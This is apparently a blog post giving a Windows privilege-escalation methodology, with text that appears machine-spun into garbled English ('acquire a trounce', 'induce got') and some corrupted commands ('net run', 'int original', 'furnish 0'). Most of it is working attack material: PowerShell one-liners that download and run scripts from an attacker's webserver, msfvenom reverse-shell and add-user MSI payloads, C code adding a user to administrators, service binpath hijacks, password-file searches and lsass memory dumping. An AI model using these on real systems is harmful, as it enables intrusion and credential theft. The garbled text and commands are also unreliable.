Windows Privilege escalation was i thing I struggled with, it was slow plenty to acquire a trounce but what next? I am only a normal user. Where exercise I start, what to await for, I gauge these are questions that come upwardly to your hear when y'all desire to escalate. Well this is the methodology which I follow for privilege escalation. Again this is solely my menstruum together with yours may hold upwardly different, follow what industrial plant best for you.
Okay in i trial I acquire my shell, I desire to escalate equally rapidly equally possible without wasting also much fourth dimension thence I run the scripts, honour just what needs to hold upwardly done together with exploit it. I would advise y'all to endeavor out all the manual methods commencement earlier using automated scripts or y'all volition non know which tool gives which data. Once y'all know that acquire for the automated scripts.
Remember each script has dissimilar formats together with cheque for dissimilar things thence know what just the scripts are doing earlier running them. I would advise to run wget.vbs for transferring files from linux to windows equally that ever worked for me.
I) Automated scripts:
Script 2: https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
I never got an interactive powershell cmd thence I run oneliners.
One-liners for script iv & 5:
These one-liners download the script from your webserver together with run it straight on the victim machine.
c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/PowerUp.ps1') ; Invoke-AllChecks"
c:\>powershell.exe -ExecutionPolicy Bypass -noLogo -Command "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/powerup.ps1') ; Invoke-AllChecks"
c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/Sherlock.ps1') ; Find-AllVulns"
If y'all induce got your ps1 file downloaded to the victim machine together with then run using this
c:\>powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"
c:\>powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
I ever prefer the one-liners, construct clean together with simple, but y'all mightiness lose your trounce after executing it.
II) Manual enumerations:
Step1: Analyze script 1, iii & 4
I volition hold upwardly listing out the manual procedure downwards below but for at in i trial these are the best guides I personally flora to hold upwardly really useful to empathize what's happening nether the hood.
Enumeration 1: http://www.fuzzysecurity.com/tutorials/16.html
Enumeration 2: http://hackingandsecurity.blogspot.in/2017/09/oscp-windows-priviledge-escalation.html
III) Kernel exploits:
Analyze script 2 together with 5.
Get the exploit-db unwrap together with supervene upon it inwards step1 to acquire the code together with compile it on your own, or in i trial y'all induce got the exploit-db unwrap y'all tin straight acquire the precompiled exploit past times using the unwrap inwards step2.
Exploit Step1)
https://www.exploit-db.com/exploits/"Exploit-db-Number"/
Exploit Step2)
https://github.com/offensive-security/exploit-database-bin-sploits/find/master/" Exploit-db-Number"
Exploit measuring 3)
So past times this fourth dimension either nosotros induce got high privilege or nosotros know what is the exact vulnerability to exploit to acquire our privilege.
And that’s it, nosotros induce got covered most everything, curt together with simple, Security patches, Kernel exploit, misconfigurations, the solely thing nosotros demand at in i trial is manual way to honour together with exploit it. Let’s caput on.
=============================================================================
Manual enumeration steps:
This is the long cast of the manual enumeration y'all saw above.
Do I know my victim?
Understanding what organisation volition assistance y'all to meliorate visualize if your exploits volition piece of employment or non since around features are available for older versions of OS together with non inwards the later on together with vice versa.
systeminfo
hostname
echo %username%
net users
netstat -ano
netsh firewall demo config
schtasks /query /fo LIST /v
tasklist /SVC ///command links running processes to started services
Easy wins:
Search all these files for passwords. Don’t immature lady out on slow escalations. Once y'all acquire the password it's only a thing of PsExec to give yourself admin privileges.
c:\unattended.txt
c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
Vnc.ini
ultravnc.ini
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
Services\Services.xml
ScheduledTasks\ScheduledTasks.xml
Printers\Printers.xml
Drives\Drives.xml
DataSources\DataSources.xml
You tin also run pwdump together with fgdump to dump out passwords.
Just an FYI earlier running these commands, I flora these commands to give a lot of output on the screen.
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Executing ascendence equally around other user, I ever prefer to run psexec.
C:\>PsExec: PsExec.exe –accepteula –u adminuser –p password c:\windows\system32\net.exe localgroup administrators MyDomain\currentusername /add
C:\>runas: c:>runas /user:virgil cmd.exe //this volition popup a novel cmd thence meliorate run this to exercise novel user or lay yourself inwards admin group.
Restart the victim organisation equally the registry changes needs to hold upwardly updated
C:\>shutdown /r /t 1
Commands to remember:
These are of import ascendence which y'all volition hold upwardly using quite often, since y'all induce got to honour the vulnerable directory or path or file.
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
Scheduled tasks:
schtasks /query /fo LIST /v
schtasks /query /fo LIST /v
Read the output of scheduled tasks together with cheque the following:
Run equally User: system
If y'all acquire whatsoever equally organisation together with then acquire through that inwards special to honour the "Task to Run", fourth dimension together with schedules.
Based on "Task to run", cheque the access permission of that folder together with file.
Eg: accesschk.exe -dqv "E:\getLogs"
If it has readwrite(RW) for authenticated users together with then nosotros tin overwrite the file its trying to run equally organisation amongst ourpayload.
Generate payload:
#msfvenom windows/shell_reverse_tcp lhost='127.0.0.1' lport='1337' -f exe > /root/Desktop/evil-log.exe copy evil-log.exe E:\getLogs\log.exe
Overwrite it. Open a listener together with hold off for it to run together with choose handgrip of a trounce equally system.
You volition demand to convey fourth dimension to examine ALL the binpaths for the windows services, scheduled tasks together with startup tasks.
The below are checked past times winprivesc/powerup thence y'all should acquire it inwards the powershell output, but induce got to larn the manual methods too.
Weak file together with folder permissions or misconfigured service:
1. Trusted Service Path/ unquoted service path:
If at that topographic point is a service amongst its exe path which has infinite inwards it together with then brand a file.exe amongst the file hollo equally the commencement hollo earlier the infinite together with restart service.
Command to cheque the servicename together with path.
C:\>wmic service acquire name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
Make certain y'all induce got permission to edit/put files inwards the folders using icacls
C:\>icacls "C:\Program Files (x86)\<Folder name>"
C:\>cacls "C:\Programs Files\foldername"
C:\>accesschk.exe -dqv "C:\Program Files\foldername"
C:\>start together with halt service
C:\>sc halt <service-name>
C:\>sc start <service-name>
C:\>sc start <service-name>
To restart a system: C:\>shutdown /r /t 0
2. Vulnerable Service:
a. Service binaries:
Replacing the entire exe amongst malicious amongst proper permissions to files together with folders.
cacls "C:\path\to\file.exe"
Look for Weakness
What nosotros are interested inwards is binaries that induce got been installed past times the user. In the output y'all desire to await for BUILTIN\Users:(F). Or where your user/usergroup has (F) or (C) rights.
Example:
C:\path\to\file.exe
BUILTIN\Users:F
BUILTIN\Power Users:C
BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
BUILTIN\Users:F
BUILTIN\Power Users:C
BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
That agency your user has write access. So y'all tin only rename the .exe file together with and then add together your ain malicious binary. And together with then restart the programme together with your binary volition hold upwardly executed instead. This tin hold upwardly a uncomplicated getsuid programme or a contrary trounce that y'all exercise amongst msfvenom.
Here is a POC code for getsuid.
#include <stdlib.h>
int original ()
{
int i;
i = system("net localgroup administrators theusername /add");
furnish 0;
}
We together with then compile it amongst mingw similar this:
i686-w64-mingw32-gcc winexp.c -lws2_32 -o exp.exe
Move the exploit binary inwards house of the original binary file.
Okay, thence at in i trial that nosotros induce got a malicious binary inwards house nosotros demand to restart the service thence that it gets executed. We tin exercise this past times using wmic or net the next way:
wmic service NAMEOFSERVICE telephone telephone startservice
net halt [service name] && cyberspace start [service name].
The binary should at in i trial hold upwardly executed inwards the SYSTEM or Administrator context.
b.Windows services:
Replacing 'binpath' property: Tool to use: accesschk.exe from sysinternals.
There is a detailed explanation for this above.
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -qwcu "Users" *
accesschk.exe -qwcu "Everyone" *
You must acquire a 'RW' amongst SERVICE_ALL_ACCESS
sc qc <service-name>
sc config <service-name> binpath= "net user virgil P@ssword123! /add"
sc config upnphost obj=".\LocalSystem" password=""
sc halt <service-name>
sc start <service-name>
sc config <service-name> binpath= "net localgroup Administrators virgil /add"
sc halt <service-name>
sc start <service-name>
sc start <service-name>
sc config <service-name> binpath= "net localgroup Administrators virgil /add"
sc halt <service-name>
sc start <service-name>
This should add together a novel user to administrators group. Try it when y'all induce got upnphost service.
This tin also hold upwardly used to acquire contrary trounce equally SYSTEM
3. Always install elevated:
If the 2 registry values are ready to 1, nosotros tin install a malicious msi file.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Generate trounce code:
msfvenom -p windows/adduser USER=virgil PASS=P@ssword123! -f msi -o exploit.msi
msfvenom -f msi-nouac -p windows/exec cmd="C:\Users\testuser\AppData\Local\Temp\Payload.exe" > exploit.msi
Run the Msi like
msiexec /quiet /qn /i C:\Users\Virgil\Downloads\exploit.msi
Dll hijacking :
This is i method which I personally dont similar doing but withal I had to. Try out dll hijacking when y'all induce got whatsoever of these application installed
Hijackable applications: https://www.exploit-db.com/dll-hijacking-vulnerable-applications/
If an application loads a DLL together with it does non give a fully qualified path, windows volition search for the dll inwards a special club together with execute it if it finds it.
Fuzzysecurity is the best guide which I follow for this topic.
Admin to system:
Psexec: admin to system
c:>psexec -i -s -d cmd.exe
This volition popup a novel cmd prompt, thence meliorate induce got rdp to system
AT:
This is replaced past times schtasks.exe inwards newer systems. This creates a scheduled draw to hold upwardly run.
This is replaced past times schtasks.exe inwards newer systems. This creates a scheduled draw to hold upwardly run.
>at 13:20 /interactive cmd
>net run \\targetserver /user:DOM\user pass
>net fourth dimension \\targetserver
>at \\targetserver 13:20 c:\temp\evil.bat
Passwords through procedure dumping:
C:\>net run \\targetserver /user:DOM\user pass
C:\>copy procdump.exe \\targetserver\c$
C:\>copy procdump.bat \\targetserver\c$
C:\>procdump.exe –ma lsass %CNAME%.dmp
C:\>at \\targetserver 13:30 C:\procdump.bat
C:\>copy \\targetserver\c$\targetserver.dmp .
This was helpful ikon that’s sums upwardly the heart exploits, non certain from which spider web log I got it, but credits to the somebody who made this. You tin truly combine this amongst the heart method I mentioned higher upwardly to straight acquire the compiled exploits.
This was the menstruum I follow overall for whatsoever windows based privilege escalation. I advise y'all to brand y'all ain checklist together with flow.
Miscellaneous:
One automated tool which I would recommend y'all to endeavor out is PSAttack.
Miscellaneous:
One automated tool which I would recommend y'all to endeavor out is PSAttack.
Credits @snadar73
